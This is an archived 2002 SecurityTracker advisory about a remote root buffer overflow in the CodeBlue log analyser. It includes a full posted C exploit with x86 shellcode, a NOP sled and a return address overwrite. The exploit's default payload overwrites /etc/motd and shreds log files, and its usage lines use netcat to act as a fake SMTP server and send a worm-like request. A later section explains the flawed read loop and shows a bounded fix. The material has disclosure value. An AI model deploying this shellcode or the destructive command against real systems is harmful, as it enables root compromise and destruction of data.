SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Generic)  >   CodeBlue Vendors:   Apollyon
CodeBlue Log File Analysis Software Has Buffer Overflow That Allows Remote Users to Obtain Root Privileges
SecurityTracker Alert ID:  1003577
SecurityTracker URL:  http://securitytracker.com/id/1003577
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 17 2002
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): 4
Description:   A vulnerability was reported in the CodeBlue log file analysis program. A remote user can obtain root access on the system running CodeBlue.

CodeBlue is apparently designed to review Apache web server log files for entries made by various worms (e.g., CodeRed, NIMDA) and, if any are found, to e-mail the affected site. Apparently, CodeBlue also processes the SMTP responses returned by the affected site's mail server. It is reported that CodeBlue contains a buffer overflow in its processing of those SMTP responses (the get_smtp_reply() routine, according to the exploit posted below). Because CodeBlue insists on running as root, the overflow yields root privileges.

A remote user can generate a NIMDA-like entry with the following type of request made to port 80 of the target host:

GET /default.ida?NNNNNN HTTP/1.0\n\n

Then, the remote user can wait until CodeBlue runs on the target host and then send a specially crafted SMTP message back to the server running CodeBlue. This specially crafted message may trigger a buffer overflow in CodeBlue, resulting in arbitrary code execution with root privileges on the system running CodeBlue.

Impact:   A remote user can cause arbitrary code to be executed with root privileges on the host running CodeBlue.
Solution:   No solution was available at the time of this entry.
Vendor URL:  freshmeat.net/projects/codeblue/
Cause:   Boundary error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Additional Exploit Code is Released) Re: CodeBlue Log File Analysis Software Has Buffer Overflow That Allows Remote Users to Obtain Root Privileges
Additional exploit code is available in the Source Message.



 Source Message Contents

Subject:  codeblue remote root


/* 
 * Demonstration linux-x86 remote root against codeblue v1.1 (from file header)
 * Otherwise it's known as CodeBlue v4
 *
 * This is rather trivial to exploit...
 * 
 * From get_smtp_reply()
 *
 * "We'll loop infinately, receiving
 * 1 byte at a time until we receive a carriage return
 * or line-feed character, signifying the end of the output"
 *
 * The stack looks like
 *
 *   int get_smtp_reply(int sd)
 *   {
 *       char response[1024];
 *       char reply_message[1024];  
 *   ...
 * I probably don't have to mention it, but it reads the response into response.
 * ...
 *
 * Also, since this is meant to increase security a little, why doesn't it
 * filter non-alphanumeric chars? Also, since it is playing with untrusted
 * data, why doesn't it drop uids, instead of insisting as running as root?
 *
 *    if ((userid = getuid()) != 0) {
 *       fprintf(stderr, "uid %d is invalid!\n", userid);
 *       fprintf(stderr, "This program MUST be run as root\n");
 *       exit(1);
 *    }
 *
 * Usage: gcc exp.c -o exp; ./exp | nc -l -p 25
 * Now you could do (on another terminal)
 * printf "GET /default.ida?NNNNNN HTTP/1.0\n\n" | nc remotehost 80
 * and wait until codeblue runs. 
 *
 * Granted, nc makes it remote, but why reinvent the wheel? 
 *
 * Oh, and by the way, you'll most likely have to change the offset down there.
 * Lots of improvements could (well, have) be done, such as a select(), read(),
 * write(), so you can get a remote terminal... at the moment, all it'll do
 * is make the id command display. Brute force is interesting, because you
 * have to wait until it's run. I suspect, though I haven't tried, you could
 * almost double the nop size by playing around with reply_message.
 *
 * If you had a sense of humour, you probably could turn this into a worm. This
 * is one of the reasons I don't really like automated response/attack software.
 * Or you could just trojan/modify your existing smtp to do this whenever it
 * receives a HELO localhost...
 *
 * The interesting part of this is the bug in codeblue helped me win
 * a wargame. We were given root on a box in a LAN, and got to penetrate 
 * several others. Since the person running it was sick of being scanned by 
 * the various worms, he was running this....
 *
 * Now for the paranoia part, how many of those scans that you received were
 * there to check if you were running CodeBlue?
 *
 * laters,
 * -- Andrew Griffiths
 */



#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

/* The shellcode beats doing a bindshell/connect code, since codeblue already is
 * talking to our (supposed) smtp server, so all we have to do is redirect
 * stdin/out/err to fd 5. (Assuming fd 5 is the smtp connection. It was on
 * mine.)
 */

unsigned char sc[] =
/* dupsh basically, dup2(5, (0,1,2)) */
"\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x05"
"\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
/* Standard aleph1 shellcode */
"\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c"
"\x89\x76\x08\xb0\x0b\x87\xf3\x8d\x4b\x08"
"\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd\x80"
"\xe8\xde\xff\xff\xff/bin/sh";


int main()
{
	unsigned char buf[3000];
	
	memset(buf, 0, 3000);

	/* NOP sled followed by the shellcode */
	memset(buf, 0x90, 967);
	strncpy((char *)(buf + 967), (const char *)sc, strlen((const char *)sc));
	fprintf(stderr, "buf: %s\n", (char *)buf);
	fprintf(stderr, "strlen(buf): %zu\n", strlen((const char *)buf));
	/* overwrites the saved return address; see the note on the offset above */
	buf[1036] = 0xd0;
	buf[1037] = 0xdf;
	buf[1038] = 0xff;
	buf[1039] = 0xbf;
#ifdef ICANMODIFYCCODEORMODIFYCOMPILETIMEFLAGS
	strcpy((char *)(buf + 1040), " id");
#else
	strcpy((char *)(buf + 1040), " echo warning codeblue has a remote root hole in it >/etc/motd; shred -z codeblue*log* 2>/dev/null; rm -f codeblue*log* 2>/dev/null; echo you sux. RTFC...");
#endif
	printf("%s", (char *)buf);
	return 0;
}


--
www.tasmail.com
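The defect the advisory and the posted message describe is the byte-at-a-time reply loop that stops only on CR/LF and never checks the array size. As an added example (not CodeBlue's source, the advisory's, or the poster's code), here is a reconstruction of that loop beside a bounded replacement that rejects over-long replies; the function names, the pipe helper and the sample replies are assumptions made for illustration.

```c
#include <string.h>
#include <unistd.h>

/* Reconstruction of the loop the exploit quotes from get_smtp_reply(): one
 * byte at a time into a fixed buffer until CR/LF, with no bound. Not
 * CodeBlue's actual source. A reply longer than the buffer overruns it.
 * Only ever call this on short, trusted input. */
static size_t smtp_reply_unbounded(int sd, char *response)
{
    size_t i = 0;
    char c;
    while (read(sd, &c, 1) == 1 && c != '\r' && c != '\n')
        response[i++] = c;              /* no check against the array size */
    response[i] = '\0';
    return i;
}

/* Hardened reader: the caller passes the buffer size, the loop stops one
 * byte short of it, and an over-long reply is rejected (-1) rather than
 * silently truncated. RFC 5321 caps a reply line at 512 octets incl. CRLF. */
static long smtp_reply_bounded(int sd, char *response, size_t size)
{
    size_t i = 0;
    char c;
    if (size == 0) return -1;
    while (read(sd, &c, 1) == 1 && c != '\r' && c != '\n') {
        if (i + 1 >= size) {            /* would not leave room for the NUL */
            response[0] = '\0';
            return -1;
        }
        response[i++] = c;
    }
    response[i] = '\0';
    return (long)i;
}

/* Helper: serve a constructed reply through a pipe (standing in for the
 * fake SMTP server the exploit runs via nc) and read it with the bounded
 * reader, so the behaviour can be checked without a network. */
static long bounded_from_bytes(const char *data, size_t len,
                               char *out, size_t outsz)
{
    int fds[2];
    if (pipe(fds) != 0 || write(fds[1], data, len) != (ssize_t)len)
        return -2;
    close(fds[1]);
    long r = smtp_reply_bounded(fds[0], out, outsz);
    close(fds[0]);
    return r;
}
```

A 1024-byte buffer fed a 2000-byte line now gets -1 and an empty string instead of a smashed stack; the unbounded version is kept only to show, side by side, the single missing comparison.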

